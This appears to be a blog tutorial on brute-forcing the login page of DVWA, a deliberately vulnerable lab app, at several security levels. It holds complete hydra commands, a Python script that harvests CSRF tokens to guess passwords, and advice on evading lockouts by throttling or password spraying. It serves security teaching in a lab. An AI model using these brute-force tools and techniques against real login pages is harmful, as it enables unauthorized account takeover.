DVWA Brute Force Logo

Brute Forcing Web Logins with DVWA

In this tutorial, I will show you how to beat the Low, Medium and Hard levels of the brute force challenge within DVWA (Dame Vulnerable Web App). 

If you want to follow along and have not yet got DVWA setup, take a look at this tutorial on Setting up a Vulnerable LAMP Server. This will run you through setting up a vulnerable virtual machine and installing DVWA. I have used this as bases for all my web hacking tutorials on Hemps Tutorials.

I have been meaning to write this tutorial for a while after the popularity of a previous tutorial Brute Forcing Passwords with THC-Hydra.  Which I cover using hydra to brute force a whole bunch of services exposed to the internet but in the brute forcing Webpage Login section I used a Firefox add-on called Tamper Data as the proxy to intercept the web requests and construct the hydra command.

The Problem is that Tamper Data no longer works in Firefox, this is since they transitioned to a new framework for developing Firefox extensions. This means we are going to have to use something else as a proxy and Intercept our web requests.

The best replacement for Tamper Data is to use Burp Suite as our proxy to capture the web requests we need to construct our hydra command.

Burp Suite

Burp Suite is a graphical tool for testing Web application security. Written in java, it has various tools that work seamlessly together to support the entire security testing process, from initial mapping and analysis of an application, through to finding and exploiting security vulnerabilities.

There are 3 different versions of Burp Suite. Enterprise, Professional and the free Community version as we are only going to need a fraction of burps potential in this tutorial, the free community version, should be just fine.

You can download burp suite for Linux, Mac, Windows or even in a Java JAR file which (It basically will run on anything that runs java) over at Portswigger site.

If you want more information about Burp Suite, check out this talk below “Web App Pen Testing with Burp Suite by Jason Nikola” from the recent SANS KringleCon.

Low Security

In the Low Security setting the DVWA Brute Force login prompt is just a straight forward HTTP GET request with no security in place to block or stop you from hammering it with hydra.

This will be exactly the same process I covered in Brute Forcing Passwords with THC-Hydra but this time I will be using Burp suite instead of Tamper Data to capture our requests.

Lets get logged into DVWA which unless its been changed should be the standard username and password of admin/password and lets make a start.

Step By Step Brute Force DVWA (Low Security)

  1. Set DVWA Security to Low

    Start by making sure DVWA’s security is set to Low, do this by clicking the DVWA Security button on the left menu and selecting the security level drop down to Low and click submit.



  2. Click The Brute Force button

    Click the Brute Force button on the menu on the left to enter the Brute Force Section of DVWA.

    DVWA Brute force

  3. Open Burp Suite and Setup Web proxy.

    Open up Burp Suite, once Burp is loaded, click the Proxy tab then Options and make sure you have a Proxy Listener setup.


    This should be set to your localhost 127.0.0.1:8080. You can adjust this how you need but if you are using this through your local web browser just leave these as default.

  4. Turn Intercept On

    Within Burp Suite move across to the intercept tab and make sure the Intercept button is on



    Burp is now ready to start recieving requestes and all we have left to do is setup Firefox to send its requests to the web server via Burp.

  5. Network Settings in Firefox

    Within Firefox type about:preferences in the address bar this should take you directly to the preferences tab.

    .aboutpreferences

    Scroll right down to the bottom of the page until you see Network Settings then click the settings tab.

  6. Set Proxy

    You should now be in the Connection settings within Firefox. Set the radio button to manual proxy configuration. This needs to be set to your localhost on 127.0.0.1 and the port to 8080 unless you changed the port to something other than the default in step 3.

  7. Make a request.

    Now the proxy is all configured we need to make a request to the DVWA Brute Force page.

    In my example, I used a username UsEr and a Password PaSs then click the login button.

    Brute force login DVWA

  8. Request Received by burp.

    The request should get received by Burps Proxy.


    DVWA Burp Intercept
    Make a note of this request as we will need to use information from it to construct our Hydra command later.

  9. Failed Login Message

    In Burp Suite, click the forward button to forward our intercepted request on to the web server.

    Failed Login Message

    Due to not having entered the correct username and password, we get presented with an error message that states Username and/or password incorrect.

    Add this to your notes you have just taken of the request in step 8 this allows us to tell hydra anything other then this error message must be a valid login.

  10. Construct your hydra command

    Use the data Intercepted by burp to construct your hydra command as I have done below.

    hydra 192.168.0.20 -V -l admin -P ‘QuickPasswords.txt’ http-get-form “/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=low”

    I will break this hydra command down for you…

    -V Verbose output showing the login + pass for each attempt in the terminal.
    -l admin Login using the login name Provided This could be a capital -L to try against a list of usernames.
    -P Load passwords from a file in my case this file is called QuickPasswords.txt.
    http-get-form Tells hydra we want to use a get request and follows with the location of the form we want to brute force, this information was gathered from the details intercepted in step 8
    username=^USER^&password=^PASS^ This adds place markers in our command where we want hydra to brute force the request (just replace where you see the actual username and Password used when logging in.
    :F=Username and/or password incorrect. This is the failure message noted from step 9 and tells hydra anything other then this message must be a valid login.
    H=Cookie: This is the Cookie information which gets generated when you login to DVWA and is only really needed because of that initial login page on DVWA. In the real world you wont normally be logged in to get to a login page.

  11. Run Hydra Command

    Run your hydra command, depending on the size of the password list used this should only take a few miniutes or so before it finds the correct password.

    Hydra DVWA Low

If you have issues with any of these steps above, please Leave me a comment at the bottom of this tutorial and I will give you any help you need to get you up and running.

Medium Security

The Medium Security setting extends the security from the low level by adding a time delay of 2 seconds on failed logins.

Re-run the Hydra command you used from Low Security, changing the security setting at the end of the command to medium.

hydra 192.168.0.20 -V -l admin -P 'QuickPasswords.txt' http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=medium"

The Hydra command still works it just takes a little longer to run. This is because the PHP has been adjusted to add the two second time delay on all failed logins.

Luckily in DVWA we are easily able to check the PHP source code for all security levels, just click the view source button at the bottom of the DVWA Window. This will display the source PHP which shows the Login failed Sleep( 2 ) command as pictured below.

PHP source code sleep function added

This shows adding a time delay on failed logins is not a deterrent or adequate protection from a brute force attack. The wait delay only increases the time needed to perform the attack, slowing down the attack speed.

High Security

Switching to the High Security level in DVWA extends on the medium level by making the time delay between failed logins a random number between 0 and 4 seconds, the Devoloper has also introduced a Anti Cross-Site Request Forgery (CSRF) token

If you just re-run the hydra command as we did with medium Security changing the security= at the end of the command too high as below..

hydra 192.168.0.20 -V -l admin -P '/home/vreality/Downloads/QuickPasswords.txt'  http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=8g187lonl2odp8n45adoe38hg3; security=high"

Hydra’s output will error saying its found 16 valid passwords found.

DVWA on high does not work with Hydra

before going any further let us use FireFox’s inspector element by right-clicking the webpage within firefox and choose Inspect Element and lets take a look at the html.

Drill down in Inspect Element until you find the HTML for the login form. notice there is now a hidden field with the name user_token being submitted with our GET request.

HTML for DVWA Brute Force Login on High

If you change the type=”hidden” to type=”text” you should see the hidden box render in your web browser.

Unhiden user token

If you remove all the characters from this un-hidden box and try to login we get a new error message that states CSRF token is incorrect.

CSRF token is invalid

Making burp intercept a login attempt shows the user_token with a string of alpha numeric characters added to the end of the GET request.

Forward on the intercepted request and have another go at logging in, notice that the user_token= has changed to another random alpha numeric string of characters.

This is the CSRF Token and is used to add credibility to the origin of the request being received by the server, this token is a impossible to guess random number generated by the server and is sent along with our GET request.

On the brute forcing page we are currently looking at, if the CSRF Token does not match, our request will error with the message “CSRF Token is incorrect” which we have just seen previously when we sent a request removing all the characters from the hidden user_token= field.

CSRF Token Is incorrect.

No longer can use hydra alone to brute force DVWA on the high security level as hydra does not have the ability to collect the CSRF token while making the request, so we have to get a little more creative to get this Brute Force to work.

There are a few different options for us to get around this, firstly we could use Burp this can be used to capture the CSRF token and run the brute force against the page using intruder tab in Burps menus but in the community edition using this feature only allows for a single thread to be run at a time greatly reducing Burp’s attack speed.

You can also combine Burp with Hydra, putting Hydra’s traffic through a proxy like Burp, This allows Burp to handle the requests and capturing the CSRF token, altering Hydra’s initial request, so it does not need to be aware of the CSRF Token and also bypasses Burps intruder limitations in the community edition.

Lastly we can have a go at creating our own brute forcing tool, which is the option i thought was most interesting and i will be covering below using python.

If you would like to see a tutorial for either using Burp or using Burp and Hydra to brute force DVWA on high security please let me know in the comments below and I will make a separate tutorial for these.

Using Python to Brute Force DVWA (High Security)

While researching for this tutorial I come across a post over on medium by Danny Beton https://medium.com/@dannybeton/dvwa-brute-force-tutorial-high-security-456e6ed3ae39 where he covers step by step creating the python script that will allow you to capture the CSRF Token and brute force the login to DVWA on high security.

I did have to make a few changes to the original script from Danny’s page to get it working but only because I was having issues with the Password file adding 0x0n to the end of each brute force password attempt, I also wanted to see each password try output to the screen as the script runs.

My Edit to Dannys Brute Force Python script.

Below is my edited version of Danny’s Python script which i saved as DVWA-BruteForce.py.

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup

# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)

# set up our target, cookie and session
url = 'http://192.168.0.20/dvwa/vulnerabilities/brute/index.php'
cookie = {'security': 'high', 'PHPSESSID':'kjrkqb382512vao219va7sk0s4'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)

''' 
checkSuccess
@param: html (String)

Searches the response HTML for our specified success message
'''
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)
 
 if not search:
  success = False

 else:
  success = True

# return the brute force result
 return success

# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')

# Display before attack
print 'DVWA URL' + url
print 'CSRF Token='+ csrf_token

# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:

# Displays password tries and strips whitespace from password list  
  print 'password tryed: ' + password
  password = password.strip()

  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)

  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})[0].get('value')
  else:
   # Success! Show the result
   print 'Password is: ' + password
   break

# We failed, bummer. 
 if not success:
  print 'Brute force failed. No matches found.'


You will need to download the Python modules beautyfulsoup and requests for the script above to work as these are not part of the default pre installed modules in Python.

BeautyfulSoup is a web scrapping library used to capture the CSRF token. Requests are what he used to make the requests to the web server. He also used argv to supply arguments to the script from the command line but this module already comes installed.

These modules can be installed using pip with the commands below.

sudo pip install requests
sudo pip install beautifulsoup

Also to get this to work you need to edit the URL = in the script to be the IP address of your DVWA web server, also you need to capture a PHPSESSID using Burp as we did previously in step 8 on the Low Security setting, add your PHPSESSID = to the script.

Run the Python Script using this command below adding the password list and the message which is received on a successful login.

python DVWA-BruteForce.py QuickPasswords.txt "Welcome to the password protected area admin"

If the Script works you should see an output like this..

DVWA High Security Brute Force Script Output.

Impossible Security

Brute Force and user enumeration should not be possible at the impossible security level in DVWA. There is now a lock out feature, where if there are five bad logins within 15 minutes the user account gets locked out.

If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. this should make it impossible to know there is a valid account on the system.

error message from failed login on impossible DVWA Brute Force

If time is not an issue we do have a couple of options here that would eventually brute force the login. We could Edit the python script we used on High Security and add a 15-minute wait after every 4 password tries. This would mean that you only try 16 diffrnet passwords a hour and if you had a huge wordlist could take you months or even years to complete.

The other option would be to use password spraying this is where you use one password against multiple users and because you are not hammering the hell out of a single user you end up not not hitting the lock out threshold .

If you would like to see some more information about Password Sparying leave me a comment below and i will make sure i add it to the list of future posts.

HomeWork

Using every thing that you have just learnt from this tutorial and the BruteForcing Passwords with THC Hydra tutorial. Set the DVWA security to low and use Hydra to try and enumerate\Brute Force the other four user logins and post your findings in the comments section below.

References:

Leave a Reply

Your email address will not be published. Required fields are marked *